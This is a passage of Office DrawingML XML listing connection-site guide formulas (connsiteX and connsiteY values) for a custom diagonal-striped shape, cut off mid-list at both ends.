              <a:gd name="connsiteX378" fmla="*/ 23253463 w 23952872"/>
              <a:gd name="connsiteY378" fmla="*/ 26946980 h 26946982"/>
              <a:gd name="connsiteX379" fmla="*/ 3 w 23952872"/>
              <a:gd name="connsiteY379" fmla="*/ 3693521 h 26946982"/>
              <a:gd name="connsiteX380" fmla="*/ 4 w 23952872"/>
              <a:gd name="connsiteY380" fmla="*/ 3326468 h 26946982"/>
              <a:gd name="connsiteX381" fmla="*/ 23620515 w 23952872"/>
              <a:gd name="connsiteY381" fmla="*/ 26946978 h 26946982"/>
              <a:gd name="connsiteX382" fmla="*/ 23500486 w 23952872"/>
              <a:gd name="connsiteY382" fmla="*/ 26946980 h 26946982"/>
              <a:gd name="connsiteX383" fmla="*/ 8 w 23952872"/>
              <a:gd name="connsiteY383" fmla="*/ 3446502 h 26946982"/>
              <a:gd name="connsiteX384" fmla="*/ 4 w 23952872"/>
              <a:gd name="connsiteY384" fmla="*/ 3079445 h 26946982"/>
              <a:gd name="connsiteX385" fmla="*/ 23867538 w 23952872"/>
              <a:gd name="connsiteY385" fmla="*/ 26946978 h 26946982"/>
              <a:gd name="connsiteX386" fmla="*/ 23747515 w 23952872"/>
              <a:gd name="connsiteY386" fmla="*/ 26946980 h 26946982"/>
              <a:gd name="connsiteX387" fmla="*/ 3 w 23952872"/>
              <a:gd name="connsiteY387" fmla="*/ 3199468 h 26946982"/>
              <a:gd name="connsiteX388" fmla="*/ 4 w 23952872"/>
              <a:gd name="connsiteY388" fmla="*/ 2832427 h 26946982"/>
              <a:gd name="connsiteX389" fmla="*/ 23952872 w 23952872"/>
              <a:gd name="connsiteY389" fmla="*/ 26785295 h 26946982"/>
              <a:gd name="connsiteX390" fmla="*/ 23952870 w 23952872"/>
              <a:gd name="connsiteY390" fmla="*/ 26905324 h 26946982"/>
              <a:gd name="connsiteX391" fmla="*/ 5 w 23952872"/>
              <a:gd name="connsiteY391" fmla="*/ 2952458 h 26946982"/>
              <a:gd name="connsiteX392" fmla="*/ 4 w 23952872"/>
              <a:gd name="connsiteY392" fmla="*/ 2585397 h 26946982"/>
              <a:gd name="connsiteX393" fmla="*/ 23952869 w 23952872"/>
              <a:gd name="connsiteY393" fmla="*/ 26538263 h 26946982"/>
              <a:gd name="connsiteX394" fmla="*/ 23952870 w 23952872"/>
              <a:gd name="connsiteY394" fmla="*/ 26658294 h 26946982"/>
              <a:gd name="connsiteX395" fmla="*/ 3 w 23952872"/>
              <a:gd name="connsiteY395" fmla="*/ 2705426 h 26946982"/>
              <a:gd name="connsiteX396" fmla="*/ 4 w 23952872"/>
              <a:gd name="connsiteY396" fmla="*/ 2338374 h 26946982"/>
              <a:gd name="connsiteX397" fmla="*/ 23952872 w 23952872"/>
              <a:gd name="connsiteY397" fmla="*/ 26291236 h 26946982"/>
              <a:gd name="connsiteX398" fmla="*/ 23952870 w 23952872"/>
              <a:gd name="connsiteY398" fmla="*/ 26411265 h 26946982"/>
              <a:gd name="connsiteX399" fmla="*/ 3 w 23952872"/>
              <a:gd name="connsiteY399" fmla="*/ 2458403 h 26946982"/>
              <a:gd name="connsiteX400" fmla="*/ 4 w 23952872"/>
              <a:gd name="connsiteY400" fmla="*/ 2091350 h 26946982"/>
              <a:gd name="connsiteX401" fmla="*/ 23952869 w 23952872"/>
              <a:gd name="connsiteY401" fmla="*/ 26044215 h 26946982"/>
              <a:gd name="connsiteX402" fmla="*/ 23952870 w 23952872"/>
              <a:gd name="connsiteY402" fmla="*/ 26164253 h 26946982"/>
              <a:gd name="connsiteX403" fmla="*/ 3 w 23952872"/>
              <a:gd name="connsiteY403" fmla="*/ 2211385 h 26946982"/>
              <a:gd name="connsiteX404" fmla="*/ 4 w 23952872"/>
              <a:gd name="connsiteY404" fmla="*/ 1844332 h 26946982"/>
              <a:gd name="connsiteX405" fmla="*/ 23952869 w 23952872"/>
              <a:gd name="connsiteY405" fmla="*/ 25797198 h 26946982"/>
              <a:gd name="connsiteX406" fmla="*/ 23952868 w 23952872"/>
              <a:gd name="connsiteY406" fmla="*/ 25917226 h 26946982"/>
              <a:gd name="connsiteX407" fmla="*/ 3 w 23952872"/>
              <a:gd name="connsiteY407" fmla="*/ 1964361 h 26946982"/>
              <a:gd name="connsiteX408" fmla="*/ 2 w 23952872"/>
              <a:gd name="connsiteY408" fmla="*/ 1597300 h 26946982"/>
              <a:gd name="connsiteX409" fmla="*/ 23952869 w 23952872"/>
              <a:gd name="connsiteY409" fmla="*/ 25550168 h 26946982"/>
              <a:gd name="connsiteX410" fmla="*/ 23952868 w 23952872"/>
              <a:gd name="connsiteY410" fmla="*/ 25670197 h 26946982"/>
              <a:gd name="connsiteX411" fmla="*/ 4 w 23952872"/>
              <a:gd name="connsiteY411" fmla="*/ 1717336 h 26946982"/>
              <a:gd name="connsiteX412" fmla="*/ 4 w 23952872"/>
              <a:gd name="connsiteY412" fmla="*/ 1350280 h 26946982"/>
              <a:gd name="connsiteX413" fmla="*/ 23952869 w 23952872"/>
              <a:gd name="connsiteY413" fmla="*/ 25303145 h 26946982"/>
              <a:gd name="connsiteX414" fmla="*/ 23952870 w 23952872"/>
              <a:gd name="connsiteY414" fmla="*/ 25423176 h 26946982"/>
              <a:gd name="connsiteX415" fmla="*/ 0 w 23952872"/>
              <a:gd name="connsiteY415" fmla="*/ 1470306 h 26946982"/>
              <a:gd name="connsiteX416" fmla="*/ 2 w 23952872"/>
              <a:gd name="connsiteY416" fmla="*/ 1103265 h 26946982"/>
              <a:gd name="connsiteX417" fmla="*/ 23952869 w 23952872"/>
              <a:gd name="connsiteY417" fmla="*/ 25056133 h 26946982"/>
              <a:gd name="connsiteX418" fmla="*/ 23952868 w 23952872"/>
              <a:gd name="connsiteY418" fmla="*/ 25176150 h 26946982"/>
              <a:gd name="connsiteX419" fmla="*/ 3 w 23952872"/>
              <a:gd name="connsiteY419" fmla="*/ 1223285 h 26946982"/>
              <a:gd name="connsiteX420" fmla="*/ 7 w 23952872"/>
              <a:gd name="connsiteY420" fmla="*/ 856241 h 26946982"/>
              <a:gd name="connsiteX421" fmla="*/ 23952872 w 23952872"/>
              <a:gd name="connsiteY421" fmla="*/ 24809106 h 26946982"/>
              <a:gd name="connsiteX422" fmla="*/ 23952868 w 23952872"/>
              <a:gd name="connsiteY422" fmla="*/ 24929126 h 26946982"/>
              <a:gd name="connsiteX423" fmla="*/ 2 w 23952872"/>
              <a:gd name="connsiteY423" fmla="*/ 976261 h 26946982"/>
              <a:gd name="connsiteX424" fmla="*/ 4 w 23952872"/>
              <a:gd name="connsiteY424" fmla="*/ 609215 h 26946982"/>
              <a:gd name="connsiteX425" fmla="*/ 23952869 w 23952872"/>
              <a:gd name="connsiteY425" fmla="*/ 24562080 h 26946982"/>
              <a:gd name="connsiteX426" fmla="*/ 23952868 w 23952872"/>
              <a:gd name="connsiteY426" fmla="*/ 24682097 h 26946982"/>
              <a:gd name="connsiteX427" fmla="*/ 2 w 23952872"/>
              <a:gd name="connsiteY427" fmla="*/ 729232 h 26946982"/>
              <a:gd name="connsiteX428" fmla="*/ 4 w 23952872"/>
              <a:gd name="connsiteY428" fmla="*/ 362185 h 26946982"/>
              <a:gd name="connsiteX429" fmla="*/ 23952872 w 23952872"/>
              <a:gd name="connsiteY429" fmla="*/ 24315048 h 26946982"/>
              <a:gd name="connsiteX430" fmla="*/ 23952872 w 23952872"/>
              <a:gd name="connsiteY430" fmla="*/ 24435087 h 26946982"/>
              <a:gd name="connsiteX431" fmla="*/ 4 w 23952872"/>
              <a:gd name="connsiteY431" fmla="*/ 482219 h 26946982"/>
              <a:gd name="connsiteX432" fmla="*/ 4 w 23952872"/>
              <a:gd name="connsiteY432" fmla="*/ 115162 h 26946982"/>
              <a:gd name="connsiteX433" fmla="*/ 23952869 w 23952872"/>
              <a:gd name="connsiteY433" fmla="*/ 24068027 h 26946982"/>
              <a:gd name="connsiteX434" fmla="*/ 23952869 w 23952872"/>
              <a:gd name="connsiteY434" fmla="*/ 24188066 h 26946982"/>
              <a:gd name="connsiteX435" fmla="*/ 4 w 23952872"/>
              <a:gd name="connsiteY435" fmla="*/ 235202 h 26946982"/>
              <a:gd name="connsiteX436" fmla="*/ 20634699 w 23952872"/>
              <a:gd name="connsiteY436" fmla="*/ 4 h 26946982"/>
              <a:gd name="connsiteX437" fmla="*/ 23952869 w 23952872"/>
              <a:gd name="connsiteY437" fmla="*/ 3318175 h 26946982"/>
              <a:gd name="connsiteX438" fmla="*/ 23952866 w 23952872"/>
              <a:gd name="connsiteY438" fmla="*/ 3438193 h 26946982"/>
              <a:gd name="connsiteX439" fmla="*/ 20514677 w 23952872"/>
              <a:gd name="connsiteY439" fmla="*/ 6 h 26946982"/>
              <a:gd name="connsiteX440" fmla="*/ 23725953 w 23952872"/>
              <a:gd name="connsiteY440" fmla="*/ 2 h 26946982"/>
              <a:gd name="connsiteX441" fmla="*/ 23845980 w 23952872"/>
              <a:gd name="connsiteY441" fmla="*/ 2 h 26946982"/>
              <a:gd name="connsiteX442" fmla="*/ 23952869 w 23952872"/>
              <a:gd name="connsiteY442" fmla="*/ 106891 h 26946982"/>
              <a:gd name="connsiteX443" fmla="*/ 23952869 w 23952872"/>
              <a:gd name="connsiteY443" fmla="*/ 226919 h 26946982"/>
              <a:gd name="connsiteX444" fmla="*/ 23478929 w 23952872"/>
              <a:gd name="connsiteY444" fmla="*/ 2 h 26946982"/>
              <a:gd name="connsiteX445" fmla="*/ 23598962 w 23952872"/>
              <a:gd name="connsiteY445" fmla="*/ 2 h 26946982"/>
              <a:gd name="connsiteX446" fmla="*/ 23952869 w 23952872"/>
              <a:gd name="connsiteY446" fmla="*/ 353909 h 26946982"/>
              <a:gd name="connsiteX447" fmla="*/ 23952869 w 23952872"/>
              <a:gd name="connsiteY447" fmla="*/ 473942 h 26946982"/>
              <a:gd name="connsiteX448" fmla="*/ 23231917 w 23952872"/>
              <a:gd name="connsiteY448" fmla="*/ 2 h 26946982"/>
              <a:gd name="connsiteX449" fmla="*/ 23351944 w 23952872"/>
              <a:gd name="connsiteY449" fmla="*/ 2 h 26946982"/>
              <a:gd name="connsiteX450" fmla="*/ 23952869 w 23952872"/>
              <a:gd name="connsiteY450" fmla="*/ 600927 h 26946982"/>
              <a:gd name="connsiteX451" fmla="*/ 23952869 w 23952872"/>
              <a:gd name="connsiteY451" fmla="*/ 720955 h 26946982"/>
              <a:gd name="connsiteX452" fmla="*/ 22984876 w 23952872"/>
              <a:gd name="connsiteY452" fmla="*/ 2 h 26946982"/>
              <a:gd name="connsiteX453" fmla="*/ 23104912 w 23952872"/>
              <a:gd name="connsiteY453" fmla="*/ 6 h 26946982"/>
              <a:gd name="connsiteX454" fmla="*/ 23952866 w 23952872"/>
              <a:gd name="connsiteY454" fmla="*/ 847959 h 26946982"/>
              <a:gd name="connsiteX455" fmla="*/ 23952866 w 23952872"/>
              <a:gd name="connsiteY455" fmla="*/ 967992 h 26946982"/>
              <a:gd name="connsiteX456" fmla="*/ 22857891 w 23952872"/>
              <a:gd name="connsiteY456" fmla="*/ 2 h 26946982"/>
              <a:gd name="connsiteX457" fmla="*/ 23952869 w 23952872"/>
              <a:gd name="connsiteY457" fmla="*/ 1094980 h 26946982"/>
              <a:gd name="connsiteX458" fmla="*/ 23952866 w 23952872"/>
              <a:gd name="connsiteY458" fmla="*/ 1215010 h 26946982"/>
              <a:gd name="connsiteX459" fmla="*/ 22737861 w 23952872"/>
              <a:gd name="connsiteY459" fmla="*/ 6 h 26946982"/>
              <a:gd name="connsiteX460" fmla="*/ 22490835 w 23952872"/>
              <a:gd name="connsiteY460" fmla="*/ 2 h 26946982"/>
              <a:gd name="connsiteX461" fmla="*/ 22610871 w 23952872"/>
              <a:gd name="connsiteY461" fmla="*/ 6 h 26946982"/>
              <a:gd name="connsiteX462" fmla="*/ 23952866 w 23952872"/>
              <a:gd name="connsiteY462" fmla="*/ 1342001 h 26946982"/>
              <a:gd name="connsiteX463" fmla="*/ 23952866 w 23952872"/>
              <a:gd name="connsiteY463" fmla="*/ 1462033 h 26946982"/>
              <a:gd name="connsiteX464" fmla="*/ 22243833 w 23952872"/>
              <a:gd name="connsiteY464" fmla="*/ 2 h 26946982"/>
              <a:gd name="connsiteX465" fmla="*/ 22363867 w 23952872"/>
              <a:gd name="connsiteY465" fmla="*/ 2 h 26946982"/>
              <a:gd name="connsiteX466" fmla="*/ 23952866 w 23952872"/>
              <a:gd name="connsiteY466" fmla="*/ 1589001 h 26946982"/>
              <a:gd name="connsiteX467" fmla="*/ 23952869 w 23952872"/>
              <a:gd name="connsiteY467" fmla="*/ 1709037 h 26946982"/>
              <a:gd name="connsiteX468" fmla="*/ 22116832 w 23952872"/>
              <a:gd name="connsiteY468" fmla="*/ 2 h 26946982"/>
              <a:gd name="connsiteX469" fmla="*/ 23952869 w 23952872"/>
              <a:gd name="connsiteY469" fmla="*/ 1836039 h 26946982"/>
              <a:gd name="connsiteX470" fmla="*/ 23952868 w 23952872"/>
              <a:gd name="connsiteY470" fmla="*/ 1956050 h 26946982"/>
              <a:gd name="connsiteX471" fmla="*/ 21996824 w 23952872"/>
              <a:gd name="connsiteY471" fmla="*/ 6 h 26946982"/>
              <a:gd name="connsiteX472" fmla="*/ 21749786 w 23952872"/>
              <a:gd name="connsiteY472" fmla="*/ 2 h 26946982"/>
              <a:gd name="connsiteX473" fmla="*/ 21869803 w 23952872"/>
              <a:gd name="connsiteY473" fmla="*/ 2 h 26946982"/>
              <a:gd name="connsiteX474" fmla="*/ 23952869 w 23952872"/>
              <a:gd name="connsiteY474" fmla="*/ 2083068 h 26946982"/>
              <a:gd name="connsiteX475" fmla="*/ 23952868 w 23952872"/>
              <a:gd name="connsiteY475" fmla="*/ 2203084 h 26946982"/>
              <a:gd name="connsiteX476" fmla="*/ 21622790 w 23952872"/>
              <a:gd name="connsiteY476" fmla="*/ 2 h 26946982"/>
              <a:gd name="connsiteX477" fmla="*/ 23952869 w 23952872"/>
              <a:gd name="connsiteY477" fmla="*/ 2330081 h 26946982"/>
              <a:gd name="connsiteX478" fmla="*/ 23952866 w 23952872"/>
              <a:gd name="connsiteY478" fmla="*/ 2450116 h 26946982"/>
              <a:gd name="connsiteX479" fmla="*/ 21502754 w 23952872"/>
              <a:gd name="connsiteY479" fmla="*/ 6 h 26946982"/>
              <a:gd name="connsiteX480" fmla="*/ 21255733 w 23952872"/>
              <a:gd name="connsiteY480" fmla="*/ 2 h 26946982"/>
              <a:gd name="connsiteX481" fmla="*/ 21375778 w 23952872"/>
              <a:gd name="connsiteY481" fmla="*/ 2 h 26946982"/>
              <a:gd name="connsiteX482" fmla="*/ 23952866 w 23952872"/>
              <a:gd name="connsiteY482" fmla="*/ 2577090 h 26946982"/>
              <a:gd name="connsiteX483" fmla="*/ 23952866 w 23952872"/>
              <a:gd name="connsiteY483" fmla="*/ 2697134 h 26946982"/>
              <a:gd name="connsiteX484" fmla="*/ 21128748 w 23952872"/>
              <a:gd name="connsiteY484" fmla="*/ 2 h 26946982"/>
              <a:gd name="connsiteX485" fmla="*/ 23952869 w 23952872"/>
              <a:gd name="connsiteY485" fmla="*/ 2824121 h 26946982"/>
              <a:gd name="connsiteX486" fmla="*/ 23952866 w 23952872"/>
              <a:gd name="connsiteY486" fmla="*/ 2944158 h 26946982"/>
              <a:gd name="connsiteX487" fmla="*/ 21008713 w 23952872"/>
              <a:gd name="connsiteY487" fmla="*/ 6 h 26946982"/>
              <a:gd name="connsiteX488" fmla="*/ 20881709 w 23952872"/>
              <a:gd name="connsiteY488" fmla="*/ 2 h 26946982"/>
              <a:gd name="connsiteX489" fmla="*/ 23952869 w 23952872"/>
              <a:gd name="connsiteY489" fmla="*/ 3071162 h 26946982"/>
              <a:gd name="connsiteX490" fmla="*/ 23952866 w 23952872"/>
              <a:gd name="connsiteY490" fmla="*/ 3191170 h 26946982"/>
              <a:gd name="connsiteX491" fmla="*/ 20761700 w 23952872"/>
              <a:gd name="connsiteY491" fmla="*/ 6 h 26946982"/>
              <a:gd name="connsiteX492" fmla="*/ 20267634 w 23952872"/>
              <a:gd name="connsiteY492" fmla="*/ 2 h 26946982"/>
              <a:gd name="connsiteX493" fmla="*/ 20387686 w 23952872"/>
              <a:gd name="connsiteY493" fmla="*/ 4 h 26946982"/>
              <a:gd name="connsiteX494" fmla="*/ 23952866 w 23952872"/>
              <a:gd name="connsiteY494" fmla="*/ 3565184 h 26946982"/>
              <a:gd name="connsiteX495" fmla="*/ 23952866 w 23952872"/>
              <a:gd name="connsiteY495" fmla="*/ 3685234 h 26946982"/>
              <a:gd name="connsiteX496" fmla="*/ 19773592 w 23952872"/>
              <a:gd name="connsiteY496" fmla="*/ 2 h 26946982"/>
              <a:gd name="connsiteX497" fmla="*/ 19893631 w 23952872"/>
              <a:gd name="connsiteY497" fmla="*/ 2 h 26946982"/>
              <a:gd name="connsiteX498" fmla="*/ 23952869 w 23952872"/>
              <a:gd name="connsiteY498" fmla="*/ 4059240 h 26946982"/>
              <a:gd name="connsiteX499" fmla="*/ 23952868 w 23952872"/>
              <a:gd name="connsiteY499" fmla="*/ 4179278 h 26946982"/>
              <a:gd name="connsiteX500" fmla="*/ 19526569 w 23952872"/>
              <a:gd name="connsiteY500" fmla="*/ 2 h 26946982"/>
              <a:gd name="connsiteX501" fmla="*/ 19646593 w 23952872"/>
              <a:gd name="connsiteY501" fmla="*/ 4 h 26946982"/>
              <a:gd name="connsiteX502" fmla="*/ 23952866 w 23952872"/>
              <a:gd name="connsiteY502" fmla="*/ 4306277 h 26946982"/>
              <a:gd name="connsiteX503" fmla="*/ 23952868 w 23952872"/>
              <a:gd name="connsiteY503" fmla="*/ 4426302 h 26946982"/>
              <a:gd name="connsiteX504" fmla="*/ 19032539 w 23952872"/>
              <a:gd name="connsiteY504" fmla="*/ 2 h 26946982"/>
              <a:gd name="connsiteX505" fmla="*/ 19152560 w 23952872"/>
              <a:gd name="connsiteY505" fmla="*/ 2 h 26946982"/>
              <a:gd name="connsiteX506" fmla="*/ 23952866 w 23952872"/>
              <a:gd name="connsiteY506" fmla="*/ 4800307 h 26946982"/>
              <a:gd name="connsiteX507" fmla="*/ 23952865 w 23952872"/>
              <a:gd name="connsiteY507" fmla="*/ 4920329 h 26946982"/>
              <a:gd name="connsiteX508" fmla="*/ 18785510 w 23952872"/>
              <a:gd name="connsiteY508" fmla="*/ 2 h 26946982"/>
              <a:gd name="connsiteX509" fmla="*/ 18905523 w 23952872"/>
              <a:gd name="connsiteY509" fmla="*/ 4 h 26946982"/>
              <a:gd name="connsiteX510" fmla="*/ 23952866 w 23952872"/>
              <a:gd name="connsiteY510" fmla="*/ 5047348 h 26946982"/>
              <a:gd name="connsiteX511" fmla="*/ 23952868 w 23952872"/>
              <a:gd name="connsiteY511" fmla="*/ 5167360 h 26946982"/>
              <a:gd name="connsiteX512" fmla="*/ 18411484 w 23952872"/>
              <a:gd name="connsiteY512" fmla="*/ 2 h 26946982"/>
              <a:gd name="connsiteX513" fmla="*/ 23952866 w 23952872"/>
              <a:gd name="connsiteY513" fmla="*/ 5541383 h 26946982"/>
              <a:gd name="connsiteX514" fmla="*/ 23952866 w 23952872"/>
              <a:gd name="connsiteY514" fmla="*/ 5661411 h 26946982"/>
              <a:gd name="connsiteX515" fmla="*/ 18291460 w 23952872"/>
              <a:gd name="connsiteY515" fmla="*/ 6 h 26946982"/>
              <a:gd name="connsiteX516" fmla="*/ 18164455 w 23952872"/>
              <a:gd name="connsiteY516" fmla="*/ 2 h 26946982"/>
              <a:gd name="connsiteX517" fmla="*/ 23952869 w 23952872"/>
              <a:gd name="connsiteY517" fmla="*/ 5788415 h 26946982"/>
              <a:gd name="connsiteX518" fmla="*/ 23952867 w 23952872"/>
              <a:gd name="connsiteY518" fmla="*/ 5908436 h 26946982"/>
              <a:gd name="connsiteX519" fmla="*/ 18044436 w 23952872"/>
              <a:gd name="connsiteY519" fmla="*/ 4 h 26946982"/>
              <a:gd name="connsiteX520" fmla="*/ 16929343 w 23952872"/>
              <a:gd name="connsiteY520" fmla="*/ 2 h 26946982"/>
              <a:gd name="connsiteX521" fmla="*/ 23952869 w 23952872"/>
              <a:gd name="connsiteY521" fmla="*/ 7023527 h 26946982"/>
              <a:gd name="connsiteX522" fmla="*/ 23952867 w 23952872"/>
              <a:gd name="connsiteY522" fmla="*/ 7143564 h 26946982"/>
              <a:gd name="connsiteX523" fmla="*/ 16809307 w 23952872"/>
              <a:gd name="connsiteY523" fmla="*/ 4 h 26946982"/>
              <a:gd name="connsiteX524" fmla="*/ 20140638 w 23952872"/>
              <a:gd name="connsiteY524" fmla="*/ 2 h 26946982"/>
              <a:gd name="connsiteX525" fmla="*/ 23952869 w 23952872"/>
              <a:gd name="connsiteY525" fmla="*/ 3812233 h 26946982"/>
              <a:gd name="connsiteX526" fmla="*/ 23952866 w 23952872"/>
              <a:gd name="connsiteY526" fmla="*/ 3932246 h 26946982"/>
              <a:gd name="connsiteX527" fmla="*/ 20020621 w 23952872"/>
              <a:gd name="connsiteY527" fmla="*/ 2 h 26946982"/>
              <a:gd name="connsiteX528" fmla="*/ 19399573 w 23952872"/>
              <a:gd name="connsiteY528" fmla="*/ 2 h 26946982"/>
              <a:gd name="connsiteX529" fmla="*/ 23952866 w 23952872"/>
              <a:gd name="connsiteY529" fmla="*/ 4553295 h 26946982"/>
              <a:gd name="connsiteX530" fmla="*/ 23952868 w 23952872"/>
              <a:gd name="connsiteY530" fmla="*/ 4673314 h 26946982"/>
              <a:gd name="connsiteX531" fmla="*/ 19279557 w 23952872"/>
              <a:gd name="connsiteY531" fmla="*/ 2 h 26946982"/>
              <a:gd name="connsiteX532" fmla="*/ 18658491 w 23952872"/>
              <a:gd name="connsiteY532" fmla="*/ 2 h 26946982"/>
              <a:gd name="connsiteX533" fmla="*/ 23952869 w 23952872"/>
              <a:gd name="connsiteY533" fmla="*/ 5294380 h 26946982"/>
              <a:gd name="connsiteX534" fmla="*/ 23952868 w 23952872"/>
              <a:gd name="connsiteY534" fmla="*/ 5414401 h 26946982"/>
              <a:gd name="connsiteX535" fmla="*/ 18538469 w 23952872"/>
              <a:gd name="connsiteY535" fmla="*/ 2 h 26946982"/>
              <a:gd name="connsiteX536" fmla="*/ 17797415 w 23952872"/>
              <a:gd name="connsiteY536" fmla="*/ 2 h 26946982"/>
              <a:gd name="connsiteX537" fmla="*/ 17917440 w 23952872"/>
              <a:gd name="connsiteY537" fmla="*/ 4 h 26946982"/>
              <a:gd name="connsiteX538" fmla="*/ 23952869 w 23952872"/>
              <a:gd name="connsiteY538" fmla="*/ 6035433 h 26946982"/>
              <a:gd name="connsiteX539" fmla="*/ 23952870 w 23952872"/>
              <a:gd name="connsiteY539" fmla="*/ 6155457 h 26946982"/>
              <a:gd name="connsiteX540" fmla="*/ 17550385 w 23952872"/>
              <a:gd name="connsiteY540" fmla="*/ 2 h 26946982"/>
              <a:gd name="connsiteX541" fmla="*/ 17670422 w 23952872"/>
              <a:gd name="connsiteY541" fmla="*/ 4 h 26946982"/>
              <a:gd name="connsiteX542" fmla="*/ 23952869 w 23952872"/>
              <a:gd name="connsiteY542" fmla="*/ 6282451 h 26946982"/>
              <a:gd name="connsiteX543" fmla="*/ 23952870 w 23952872"/>
              <a:gd name="connsiteY543" fmla="*/ 6402486 h 26946982"/>
              <a:gd name="connsiteX544" fmla="*/ 17303356 w 23952872"/>
              <a:gd name="connsiteY544" fmla="*/ 2 h 26946982"/>
              <a:gd name="connsiteX545" fmla="*/ 17423401 w 23952872"/>
              <a:gd name="connsiteY545" fmla="*/ 2 h 26946982"/>
              <a:gd name="connsiteX546" fmla="*/ 23952869 w 23952872"/>
              <a:gd name="connsiteY546" fmla="*/ 6529469 h 26946982"/>
              <a:gd name="connsiteX547" fmla="*/ 23952870 w 23952872"/>
              <a:gd name="connsiteY547" fmla="*/ 6649515 h 26946982"/>
              <a:gd name="connsiteX548" fmla="*/ 17056339 w 23952872"/>
              <a:gd name="connsiteY548" fmla="*/ 2 h 26946982"/>
              <a:gd name="connsiteX549" fmla="*/ 17176373 w 23952872"/>
              <a:gd name="connsiteY549" fmla="*/ 2 h 26946982"/>
              <a:gd name="connsiteX550" fmla="*/ 23952866 w 23952872"/>
              <a:gd name="connsiteY550" fmla="*/ 6776495 h 26946982"/>
              <a:gd name="connsiteX551" fmla="*/ 23952867 w 23952872"/>
              <a:gd name="connsiteY551" fmla="*/ 6896530 h 26946982"/>
              <a:gd name="connsiteX552" fmla="*/ 16562297 w 23952872"/>
              <a:gd name="connsiteY552" fmla="*/ 2 h 26946982"/>
              <a:gd name="connsiteX553" fmla="*/ 16682320 w 23952872"/>
              <a:gd name="connsiteY553" fmla="*/ 2 h 26946982"/>
              <a:gd name="connsiteX554" fmla="*/ 23952869 w 23952872"/>
              <a:gd name="connsiteY554" fmla="*/ 7270551 h 26946982"/>
              <a:gd name="connsiteX555" fmla="*/ 23952870 w 23952872"/>
              <a:gd name="connsiteY555" fmla="*/ 7390574 h 26946982"/>
              <a:gd name="connsiteX556" fmla="*/ 16315263 w 23952872"/>
              <a:gd name="connsiteY556" fmla="*/ 2 h 26946982"/>
              <a:gd name="connsiteX557" fmla="*/ 16435302 w 23952872"/>
              <a:gd name="connsiteY557" fmla="*/ 2 h 26946982"/>
              <a:gd name="connsiteX558" fmla="*/ 23952869 w 23952872"/>
              <a:gd name="connsiteY558" fmla="*/ 7517569 h 26946982"/>
              <a:gd name="connsiteX559" fmla="*/ 23952867 w 23952872"/>
              <a:gd name="connsiteY559" fmla="*/ 7637606 h 26946982"/>
              <a:gd name="connsiteX560" fmla="*/ 16068233 w 23952872"/>
              <a:gd name="connsiteY560" fmla="*/ 2 h 26946982"/>
              <a:gd name="connsiteX561" fmla="*/ 16188267 w 23952872"/>
              <a:gd name="connsiteY561" fmla="*/ 2 h 26946982"/>
              <a:gd name="connsiteX562" fmla="*/ 23952869 w 23952872"/>
              <a:gd name="connsiteY562" fmla="*/ 7764603 h 26946982"/>
              <a:gd name="connsiteX563" fmla="*/ 23952870 w 23952872"/>
              <a:gd name="connsiteY563" fmla="*/ 7884638 h 26946982"/>
              <a:gd name="connsiteX564" fmla="*/ 15821221 w 23952872"/>
              <a:gd name="connsiteY564" fmla="*/ 2 h 26946982"/>
              <a:gd name="connsiteX565" fmla="*/ 15941238 w 23952872"/>
              <a:gd name="connsiteY565" fmla="*/ 2 h 26946982"/>
              <a:gd name="connsiteX566" fmla="*/ 23952869 w 23952872"/>
              <a:gd name="connsiteY566" fmla="*/ 8011633 h 26946982"/>
              <a:gd name="connsiteX567" fmla="*/ 23952870 w 23952872"/>
              <a:gd name="connsiteY567" fmla="*/ 8131650 h 26946982"/>
              <a:gd name="connsiteX568" fmla="*/ 15574192 w 23952872"/>
              <a:gd name="connsiteY568" fmla="*/ 2 h 26946982"/>
              <a:gd name="connsiteX569" fmla="*/ 15694220 w 23952872"/>
              <a:gd name="connsiteY569" fmla="*/ 2 h 26946982"/>
              <a:gd name="connsiteX570" fmla="*/ 23952869 w 23952872"/>
              <a:gd name="connsiteY570" fmla="*/ 8258651 h 26946982"/>
              <a:gd name="connsiteX571" fmla="*/ 23952870 w 23952872"/>
              <a:gd name="connsiteY571" fmla="*/ 8378679 h 26946982"/>
              <a:gd name="connsiteX572" fmla="*/ 15327180 w 23952872"/>
              <a:gd name="connsiteY572" fmla="*/ 2 h 26946982"/>
              <a:gd name="connsiteX573" fmla="*/ 15447207 w 23952872"/>
              <a:gd name="connsiteY573" fmla="*/ 2 h 26946982"/>
              <a:gd name="connsiteX574" fmla="*/ 23952867 w 23952872"/>
              <a:gd name="connsiteY574" fmla="*/ 8505661 h 26946982"/>
              <a:gd name="connsiteX575" fmla="*/ 23952867 w 23952872"/>
              <a:gd name="connsiteY575" fmla="*/ 8625689 h 26946982"/>
              <a:gd name="connsiteX576" fmla="*/ 15080145 w 23952872"/>
              <a:gd name="connsiteY576" fmla="*/ 2 h 26946982"/>
              <a:gd name="connsiteX577" fmla="*/ 15200170 w 23952872"/>
              <a:gd name="connsiteY577" fmla="*/ 4 h 26946982"/>
              <a:gd name="connsiteX578" fmla="*/ 23952867 w 23952872"/>
              <a:gd name="connsiteY578" fmla="*/ 8752702 h 26946982"/>
              <a:gd name="connsiteX579" fmla="*/ 23952870 w 23952872"/>
              <a:gd name="connsiteY579" fmla="*/ 8872721 h 26946982"/>
              <a:gd name="connsiteX580" fmla="*/ 14833116 w 23952872"/>
              <a:gd name="connsiteY580" fmla="*/ 2 h 26946982"/>
              <a:gd name="connsiteX581" fmla="*/ 14953149 w 23952872"/>
              <a:gd name="connsiteY581" fmla="*/ 2 h 26946982"/>
              <a:gd name="connsiteX582" fmla="*/ 23952867 w 23952872"/>
              <a:gd name="connsiteY582" fmla="*/ 8999720 h 26946982"/>
              <a:gd name="connsiteX583" fmla="*/ 23952870 w 23952872"/>
              <a:gd name="connsiteY583" fmla="*/ 9119756 h 26946982"/>
              <a:gd name="connsiteX584" fmla="*/ 14586104 w 23952872"/>
              <a:gd name="connsiteY584" fmla="*/ 2 h 26946982"/>
              <a:gd name="connsiteX585" fmla="*/ 14706120 w 23952872"/>
              <a:gd name="connsiteY585" fmla="*/ 2 h 26946982"/>
              <a:gd name="connsiteX586" fmla="*/ 23952870 w 23952872"/>
              <a:gd name="connsiteY586" fmla="*/ 9246752 h 26946982"/>
              <a:gd name="connsiteX587" fmla="*/ 23952870 w 23952872"/>
              <a:gd name="connsiteY587" fmla="*/ 9366768 h 26946982"/>
              <a:gd name="connsiteX588" fmla="*/ 14339086 w 23952872"/>
              <a:gd name="connsiteY588" fmla="*/ 2 h 26946982"/>
              <a:gd name="connsiteX589" fmla="*/ 14459130 w 23952872"/>
